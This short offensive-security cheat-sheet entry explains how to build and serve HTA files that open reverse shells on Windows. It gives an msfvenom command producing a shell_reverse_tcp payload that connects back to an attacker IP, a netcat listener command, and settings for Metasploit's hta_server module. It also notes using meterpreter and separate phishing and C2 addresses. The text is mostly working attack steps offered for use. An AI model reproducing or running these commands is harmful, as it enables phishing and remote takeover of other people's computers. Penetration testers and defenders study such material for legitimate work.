msfvenom can be used to generate HTA refer shells.
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
-f hta-psh -o ${NAME}.htaCatch with the standard nc -lvp $ATTACKER_PORT netcat command.
Metasploit can do all of this automatically for us via exploit/windows/misc/hta_server. Critical variables to set:
LHOST— the host IP address to connect back toLPORT— the port to connect back toSRVHOST— the host IP address to serve the malicious file onpayload— the Metasploit payload to use
In quick-and-dirty cases LHOST and SRVHOST will be the same, though in more sophisticated operations (i.e., if you’re separating phishing and C2 IPs) they will be different. The payload variable is particularly useful, as you can use something like windows/meterpreter/reverse_tcp and get a meterpreter shell, rather than just a plain reverse shell!
Note that you may have to hit “Return” once the file is served to get back to the Metasploit prompt.